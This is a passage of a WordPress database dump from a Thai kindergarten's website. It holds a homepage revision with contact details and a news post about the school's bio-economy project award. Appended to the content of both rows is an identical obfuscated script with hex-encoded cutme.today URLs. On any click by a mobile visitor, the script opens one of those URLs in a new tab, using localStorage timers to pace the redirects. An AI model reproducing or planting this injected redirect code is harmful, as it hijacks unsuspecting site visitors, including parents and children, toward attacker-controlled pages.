{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-09 16:37:49','2024-09-09 09:37:49','',19,'http://watprato.ssk.in.th/?p=362',0,'revision','',0),
(367,2,'2024-09-12 13:31:52','2024-09-12 06:31:52','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":383,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458252036_122175357182202781_526320192492554342_n-1024x726.jpg\" alt=\"\" class=\"wp-image-383\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":384,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458290652_122175359900202781_4995696793881930390_n-1024x726.jpg\" alt=\"\" class=\"wp-image-384\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับเยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567','','publish','open','open','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a7%e0%b8%b4%e0%b8%96%e0%b8%b5%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2024-09-12 13:47:09','2024-09-12 06:47:09','',0,'http://watprato.ssk.in.th/?p=367',0,'post','',0),
